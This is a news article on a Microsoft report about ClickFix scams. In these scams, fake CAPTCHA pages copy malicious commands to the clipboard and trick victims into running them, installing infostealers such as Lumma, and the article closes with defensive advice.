Microsoft Details ClickFix Malware Scam That Dupes Victims With Fake CAPTCHAs
ClickFix is a social engineering tactic often deployed by bad actors who skillfully lure victims into instructing their computers to run malicious programs. The first thing hackers typically do in these attacks is to trick a victim into visiting their page, which is often a clone of a real company or popular organization's website. Microsoft observed this in a case where threat actors sent a malicious email to a target, which was used to lure the target to the fake site. From there, victims are redirected to a page that makes them feel they've encountered an issue they can fix easily.
In most cases, the solution to the issue is presented as a quick Google reCAPTCHA challenge, a technique that has been widely used in recent attacks. In contrast, previous ClickFix attacks used "Google's 'Aw, Snap!' crash error." Users are then presented with a deceptive prompt, which they are encouraged to click. It might just be a "verify you are human" checkbox.
Taking this step automatically copies malicious commands to the victim's clipboard. Most of these commands are designed to attack macOS and Windows. If users are tricked to this stage, attackers simply manipulate victims into pasting the command from their clipboard to an environment like the Windows Terminal or PowerShell. Execution of these malicious commands will download malware like the Lumma infostealer. The malware could then be used for illegal activities like stealing banking information or exfiltrating personal information.
Early in the year, a similar report emerged from HP Wolf Security, which revealed that threat actors infect victims' devices with malware by tricking them into engaging in fake CAPTCHA challenges.
To lessen the likelihood of falling victim to these attacks, Microsoft has recommended that users educate themselves on various social engineering techniques being deployed by hackers in the wild. Microsoft also claims that "Microsoft Defender XDR offers comprehensive coverage for ClickFix attacks by leveraging a range of available technologies across different attack layers."
